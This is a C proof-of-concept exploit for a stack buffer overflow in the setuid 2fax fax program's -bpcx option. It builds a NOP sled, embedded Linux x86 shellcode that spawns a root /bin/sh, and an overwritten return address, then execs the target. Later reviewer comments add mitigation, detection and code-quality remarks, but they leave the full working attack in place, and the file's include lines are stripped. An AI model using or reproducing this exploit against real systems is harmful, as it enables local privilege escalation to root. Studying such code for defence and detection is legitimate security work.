/*******************************************************************************
 *
 * 2fax local PoC exploit
 *
 * by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru]
 *
 * Bug: Buffer Overflow in -bpcx option
 * Homepage of 2fax: http://www.atbas.org/
 *
 * Solution: Don't set suid bit to 2fax program
 *
 *******************************************************************************/

/*
 * Reviewer notes (defensive reading of this PoC):
 *  - The mitigation is the one the authors give above: do not install 2fax
 *    setuid. Without the setuid bit there is no privilege to gain.
 *  - Observable traces a detector can key on: the target binary receiving a
 *    "-bpcx:" argument of more than 300 bytes (see main()), and this process
 *    spawning a shell through system() just before the exec.
 *  - The code is 32-bit-x86-only and relies on undefined behaviour in two
 *    places (getesp(), the *(long *) store in main()); it is not portable.
 */

/*
 * NOTE(review): the header names of both #include directives were lost when
 * this file was extracted; as written the directives are malformed and the
 * file does not compile. They are left exactly as found.
 */
#include
#include

/* Size of the working buffer that main() builds the option argument in. */
#define MAX_SIZE 350
/* Default delta subtracted from the stack pointer in main(); an
 * unparenthesized negative literal, harmless here because it is only ever
 * used as an initializer. */
#define OFFSET -1100
/* Fixed temp path passed to the target program. NOTE(review): the macro name
 * is that of the C library function tmpfile(); if one of the stripped
 * includes is <stdio.h>, defining a macro with that name is undefined
 * behaviour (C11 7.1.3). A predictable fixed name in a shared /tmp is also
 * the classic temp-file weakness: another local user can pre-create it. */
#define tmpfile "/tmp/abcde0987654"

/* shellcode for Linux x86 by Grange */
/* Opaque machine-code payload reproduced byte for byte; its behaviour is not
 * documented here. main() treats it as a C string (strlen/strcat), so any
 * embedded 0x00 byte would silently truncate what gets copied. */
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";

/* Returns the stack pointer as seen inside this function, 32-bit x86 only.
 * There is no return statement: the inline asm copies %esp into %eax and the
 * function relies on %eax being the return register of this ABI. Falling off
 * the end of a non-void function and using the result is undefined behaviour
 * in C; it works only by accident of the x86 calling convention, and only on
 * a 32-bit build (the asm names %esp). */
long getesp() { __asm__("movl %esp,%eax"); }

/* Prints the banner and the usage line to stdout; argc is unused.
 * NOTE(review): the usage text lists only "[offset]", but main() requires a
 * first argument (argv[1], the path it exec()s) and exits without it, so the
 * message under-documents the command line. */
void usage(int argc, char **argv) {
    printf("Local exploit for 2fax program (<= v2.02)\n by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru]\n\n"
           "Usage: %s [offset]\n\n",argv[0]);
    return;
}

/* Entry point: builds the oversized "-bpcx:" argument from a fixed-size
 * buffer and exec()s the program named by argv[1] with it. The value of
 * `ret` depends on this binary's own stack layout (getesp() is measured
 * relative to main()'s locals), so any change to the declaration list below
 * changes the program's behaviour. */
int main(int argc,char **argv) {
    /* buf: 312 bytes of content + 16 bytes of marker, within MAX_SIZE.
     * buf2: buf plus the 6-byte "-bpcx:" prefix, within MAX_SIZE + 20.
     * faxpath: copy of argv[1]; tmpexec: shell command for system(). */
    char buf[MAX_SIZE], buf2[MAX_SIZE + 20], faxpath[100], *p, tmpexec[200];
    int offset = OFFSET;
    long ret;

    /* exit(-1) is reported to the shell as status 255. */
    if(argc<2) { usage(argc,argv); exit(-1); }

    /* NOTE(review): unbounded copy into a 100-byte array; an argv[1] of 100
     * or more characters overflows the PoC's own stack. A bounded copy
     * (snprintf) would remove that self-inflicted defect. */
    strcpy(faxpath,argv[1]);

    /* argv[argc] is guaranteed to be NULL, so this test is valid when
     * argc == 2. atoi() reports no errors; strtol() would. */
    if(argv[2]) offset=atoi(argv[2]);

    /* bzero() is legacy POSIX; memset(buf, 0, sizeof buf) is the portable
     * form. The zeroing matters: strcat() below relies on the terminator
     * left after the partial memset(). */
    bzero(buf,sizeof(buf));
    bzero(buf2,sizeof(buf2));

    ret=getesp()-offset;
    /* NOTE(review): %x expects unsigned int but ret is long; %lx would match
     * the argument type. Same width on the 32-bit target, so it prints
     * correctly there by coincidence. */
    printf("ret: 0x%x, offset: %d\n",ret,offset);

    /* Fills buf to a fixed 312 bytes: 0x90 padding, then the payload. The
     * subtraction is size_t arithmetic -- if strlen(shellcode) ever exceeded
     * 312 it would wrap and memset() would write far past buf. */
    memset(buf,0x90,312-strlen(shellcode));
    strcat(buf,shellcode);
    /* 16-byte marker that the loop below overwrites with ret. */
    strcat(buf,"AAAAAAAAAAAAAAAA");
    /* Each iteration overwrites the first remaining "AAAA" with the bytes of
     * ret. Assumes sizeof(long) == 4 (true for the 32-bit target; on LP64 it
     * would store 8 bytes) and performs a possibly unaligned store through a
     * cast pointer, which x86 tolerates but C does not guarantee. The loop
     * never terminates if ret's own byte pattern equals "AAAA". */
    while( (p=(char *)strstr(buf,"AAAA")) != NULL ) *(long*)p=ret;

    /* Fits by construction (6 + at most 349 + NUL <= 370), but the sprintf
     * is unchecked; snprintf would make the bound explicit. */
    sprintf(buf2,"-bpcx:%s",buf);

    /* Creates and immediately deletes the fixed temp path via /bin/sh -c.
     * The command is built from a compile-time constant, so nothing from
     * argv reaches the shell, but system() is still a shell spawn that
     * process telemetry will record. */
    sprintf(tmpexec,"touch %s;rm -rf %s",tmpfile,tmpfile);
    system(tmpexec);

    /* Replaces this process image with faxpath; only returns on failure.
     * NOTE(review): the failure is silent -- a bad or non-executable path
     * falls through to return 0. perror("execl") before the return would
     * surface errno. */
    execl(faxpath,faxpath,buf2,tmpfile,tmpfile,NULL);
    return 0;
}